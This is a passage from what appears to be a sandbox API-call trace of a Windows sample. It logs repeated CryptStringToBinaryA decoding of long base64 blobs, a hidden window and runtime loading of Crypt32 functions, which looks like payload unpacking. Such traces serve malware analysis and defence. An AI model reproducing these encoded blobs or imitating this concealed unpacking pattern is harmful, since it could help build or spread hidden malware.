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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x1242988, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1242988, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.566] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0020.566] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0020.566] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0020.566] CryptStringToBinaryA (in: pszString="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kYSpNZLf4rWrsm+D1/KSx4ZU+erPqMqrWpbO4bOQulKH6Y6Hq8BvvdOCqqWvS5LI17utvmz+/O3BkIRW89HgrrSrTanA6b+Tx3mSutOFqcpUnNX2qrKQRZTE0saGqz+p/unLq6VQjdGNkbqtQaq9uKrAkHuQsJakr7RUi+qGrL6TOL/R+5GEqTSS35W1q7Jvg9eHkseGVPnqvKjKq1qWzpyzkLpSh+nxh6vAb73T/6qlr0uSyKS7rb5s/vyYwZCEVvPRl660q02pwJy/k8d5krqghanKVJzVm6qykEWUxL3Ghqs/qf6Ey6ulUI3RnpG6rUGqva2qwJB7kLCBpK+0VIvqk6y+kzi/0eiRhKk1kt+Itauyb4PXmJLHhlT56qGoyqtals6Ps5C6Uofp5IerwG+90+iqpa9Lksixu62+bP78i8GQhFbz0bqutKtNqcCzv5PHeZK6jYWpylSc1aiqspBFlMSIxoarW6n+s8urpYWN0auRuq3rqr2eqsCQypCwvKSvtPKL6qysvpM7v9HVkYSpLZLfu7Wrsv2D162Sx4ZX+eqWqMqr8JbOurOQumOH6deHq8BBvdPFqqWvA5LInrutvif+/KbBkIQz89GprrSrbanApr+Tx+CSupqFqcqZnNW9qrKQg5TEm8aGqzOp/q7Lq6VFjdG0kbqtTaq9g6rAkMSQsK+kr7Rqi+q5rL6Tx7/RwpGEqU2S3661q7L6g9e+kseGM/nqe6nKq+uWzlWykLomh+k6hqvANL3TNqulryuSyGu6rb5t/vxRwJCEVvPRXK+0q02pwFW+k8d5krpnhKnKVJzVQquykEWUxGbHhqs/qf5dyqulUI3RQZC6rUGqvXSrwJB7kLBapa+0VIvqSq2+kzi/0S+QhKk1kt9BtKuyb4PXU5PHhlT56mipyqtals5AspC6UofpLYarwG+90yOrpa9Lksh4uq2+bP78TMCQhFbz0UOvtKtNqcBIvpPHeZK6dISpylSc1VerspBFlMRxx4arP6n+SMqrpVCN0VKQuq1Bqr1Zq8CQe5CwdaWvtFSL6metvpM4v9EckISpNZLfdLSrsm+D12STx4ZU+epdqcqrWpbOc7KQulKH6RCGq8BvvdMcq6WvS5LIRbqtvmz+/H/AkIRW89F2r7SrTanAf76Tx3mSukGEqcpUnNVkq7KQRZTEXMeGqz+p/mfKq6VQjdF/kLqtQaq9SqvAkHuQsGClr7RUi+pwrb6TOL/RCZCEqTWS32e0q7Jvg9d5k8eGVPnqQqnKq1qWzm6ykLpSh+kDhqvAb73TCaulr0uSyFK6rb5s/vxqwJCEVvPRZa+0q02pwBK+k8d5krouhKnKVJzVCauykEWUxC/Hhqs/qT7+NJIf+UmSCMVFlATHOL8Rk269E5g8nBXlVIsq6lKHKYh5knre35Bw5lqWDudNqQDmTqp9zFr5Ks1b8xHtXI0R9WSDF/hm/jzuNqk+7T2SH+xMkgjSQ5QE0j2/EYBrvRP1V5wVilaLKodThyn7eZJ6q3uQcJFnlg6S+KkAlaCqfbEP+SqycfMRkEONEYZZgxeNBf48maSpPphjkh+f4pIIvxeUBL2gvxHtNL0T5v2cFZ9DiyqQdocp7mSSerhhkHCMcZYOjdGpAIimqn2iYfkqp2rzEYeZjRGTuYMXno3+PLToqT63RZIfsoeSCIw1lASIrL8R2gS9E9PEnBWshIsqrSyHKdHrknqFVZBwvwaWDrjNqQC/mqp9l7H5KpR78xGqMI0RvBqDF7Nu/jynP6j+CsqrpVBLVE0FRThABjgTVLLqJ6nKqwqvHsjIrzBkK2RSeD4/BXvbuAilr7QFsjrZ14EZGBFUP2+LPDQ+WjpL2dgzuq2+PscsyLqvDlEGlLNGSlRNqMBav5PHeVQ/b/bTPaqlrxs+TQVFOnVtOHnZsn+FqcoF0cUXq7KQF60UzL25IThcu7/VVFpQjNGRkrqtQWw4eb8w5P6KyKul04tVxOqZr76Ts/SIwpCEbXhYJ0zAAUFE0I68k8fy0eOShKm+GVLaH0Wy5xFX9Yfy8hEzqT9TgVTRHUfXjG7M35mRx4a/MOTujsirpdOJVcT6na++k7vEjMKQhGhIWdHVk6mykIMWRNg5ko/4KodWNVRal85Ys5C6HkFsOPQZwz4RVr7BUq60qx/kwF6/k8cp2XLHKt2gCKWvtAayOuXXgRk8SpTUR/ATId9SAcABWT3OF1E8Unk+PgV73XioC68e8MivMFZyrNN87D5ve1a+sQeTh5iBo4meFOfU+rg3PC0BpcTKwNvE3f/VwtH8qOnEV+ksWzXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+vGpcQy2AVZTYdfUkFssTysV5XwYjU80h5GVKVnRVJB5X2FvYpve1Zg37YDHQMcC7pncWw4eQy0L3fdfVjRQcAVfQVH2Txkbym8ZG97VrCULlTAnqaIzhNZPLMhaDys8A5NDApTk98Gc84BYedjXVf3bKtV7d9oCBtXvQVErTRgbpF3P2970/UgUtOJUM6sR7miNAurMrR8urQ3V5BTSg0SMR7ZpDH6cVRq5JcHZgZpmXiPfr3OF0nmKPmeX2yhh9ZXH0DBXMmmpbxyrLM0WAS2D1d1DgEJwLEQrUlSyikw8hnH5nPdYFjRFbfdTzAbCcqJZbqY86O3mvmYlpyHmIE=", cchString=0x13ec, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.566] CryptStringToBinaryA (in: pszString="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kYSpNZLf4rWrsm+D1/KSx4ZU+erPqMqrWpbO4bOQulKH6Y6Hq8BvvdOCqqWvS5LI17utvmz+/O3BkIRW89HgrrSrTanA6b+Tx3mSutOFqcpUnNX2qrKQRZTE0saGqz+p/unLq6VQjdGNkbqtQaq9uKrAkHuQsJakr7RUi+qGrL6TOL/R+5GEqTSS35W1q7Jvg9eHkseGVPnqvKjKq1qWzpyzkLpSh+nxh6vAb73T/6qlr0uSyKS7rb5s/vyYwZCEVvPRl660q02pwJy/k8d5krqghanKVJzVm6qykEWUxL3Ghqs/qf6Ey6ulUI3RnpG6rUGqva2qwJB7kLCBpK+0VIvqk6y+kzi/0eiRhKk1kt+Itauyb4PXmJLHhlT56qGoyqtals6Ps5C6Uofp5IerwG+90+iqpa9Lksixu62+bP78i8GQhFbz0bqutKtNqcCzv5PHeZK6jYWpylSc1aiqspBFlMSIxoarW6n+s8urpYWN0auRuq3rqr2eqsCQypCwvKSvtPKL6qysvpM7v9HVkYSpLZLfu7Wrsv2D162Sx4ZX+eqWqMqr8JbOurOQumOH6deHq8BBvdPFqqWvA5LInrutvif+/KbBkIQz89GprrSrbanApr+Tx+CSupqFqcqZnNW9qrKQg5TEm8aGqzOp/q7Lq6VFjdG0kbqtTaq9g6rAkMSQsK+kr7Rqi+q5rL6Tx7/RwpGEqU2S3661q7L6g9e+kseGM/nqe6nKq+uWzlWykLomh+k6hqvANL3TNqulryuSyGu6rb5t/vxRwJCEVvPRXK+0q02pwFW+k8d5krpnhKnKVJzVQquykEWUxGbHhqs/qf5dyqulUI3RQZC6rUGqvXSrwJB7kLBapa+0VIvqSq2+kzi/0S+QhKk1kt9BtKuyb4PXU5PHhlT56mipyqtals5AspC6UofpLYarwG+90yOrpa9Lksh4uq2+bP78TMCQhFbz0UOvtKtNqcBIvpPHeZK6dISpylSc1VerspBFlMRxx4arP6n+SMqrpVCN0VKQuq1Bqr1Zq8CQe5CwdaWvtFSL6metvpM4v9EckISpNZLfdLSrsm+D12STx4ZU+epdqcqrWpbOc7KQulKH6RCGq8BvvdMcq6WvS5LIRbqtvmz+/H/AkIRW89F2r7SrTanAf76Tx3mSukGEqcpUnNVkq7KQRZTEXMeGqz+p/mfKq6VQjdF/kLqtQaq9SqvAkHuQsGClr7RUi+pwrb6TOL/RCZCEqTWS32e0q7Jvg9d5k8eGVPnqQqnKq1qWzm6ykLpSh+kDhqvAb73TCaulr0uSyFK6rb5s/vxqwJCEVvPRZa+0q02pwBK+k8d5krouhKnKVJzVCauykEWUxC/Hhqs/qT7+NJIf+UmSCMVFlATHOL8Rk269E5g8nBXlVIsq6lKHKYh5knre35Bw5lqWDudNqQDmTqp9zFr5Ks1b8xHtXI0R9WSDF/hm/jzuNqk+7T2SH+xMkgjSQ5QE0j2/EYBrvRP1V5wVilaLKodThyn7eZJ6q3uQcJFnlg6S+KkAlaCqfbEP+SqycfMRkEONEYZZgxeNBf48maSpPphjkh+f4pIIvxeUBL2gvxHtNL0T5v2cFZ9DiyqQdocp7mSSerhhkHCMcZYOjdGpAIimqn2iYfkqp2rzEYeZjRGTuYMXno3+PLToqT63RZIfsoeSCIw1lASIrL8R2gS9E9PEnBWshIsqrSyHKdHrknqFVZBwvwaWDrjNqQC/mqp9l7H5KpR78xGqMI0RvBqDF7Nu/jynP6j+CsqrpVBLVE0FRThABjgTVLLqJ6nKqwqvHsjIrzBkK2RSeD4/BXvbuAilr7QFsjrZ14EZGBFUP2+LPDQ+WjpL2dgzuq2+PscsyLqvDlEGlLNGSlRNqMBav5PHeVQ/b/bTPaqlrxs+TQVFOnVtOHnZsn+FqcoF0cUXq7KQF60UzL25IThcu7/VVFpQjNGRkrqtQWw4eb8w5P6KyKul04tVxOqZr76Ts/SIwpCEbXhYJ0zAAUFE0I68k8fy0eOShKm+GVLaH0Wy5xFX9Yfy8hEzqT9TgVTRHUfXjG7M35mRx4a/MOTujsirpdOJVcT6na++k7vEjMKQhGhIWdHVk6mykIMWRNg5ko/4KodWNVRal85Ys5C6HkFsOPQZwz4RVr7BUq60qx/kwF6/k8cp2XLHKt2gCKWvtAayOuXXgRk8SpTUR/ATId9SAcABWT3OF1E8Unk+PgV73XioC68e8MivMFZyrNN87D5ve1a+sQeTh5iBo4meFOfU+rg3PC0BpcTKwNvE3f/VwtH8qOnEV+ksWzXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+vGpcQy2AVZTYdfUkFssTysV5XwYjU80h5GVKVnRVJB5X2FvYpve1Zg37YDHQMcC7pncWw4eQy0L3fdfVjRQcAVfQVH2Txkbym8ZG97VrCULlTAnqaIzhNZPLMhaDys8A5NDApTk98Gc84BYedjXVf3bKtV7d9oCBtXvQVErTRgbpF3P2970/UgUtOJUM6sR7miNAurMrR8urQ3V5BTSg0SMR7ZpDH6cVRq5JcHZgZpmXiPfr3OF0nmKPmeX2yhh9ZXH0DBXMmmpbxyrLM0WAS2D1d1DgEJwLEQrUlSyikw8hnH5nPdYFjRFbfdTzAbCcqJZbqY86O3mvmYlpyHmIE=", cchString=0x13ec, dwFlags=0x1, pbBinary=0x1243da0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1243da0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.566] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0020.566] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0020.566] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0020.566] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, 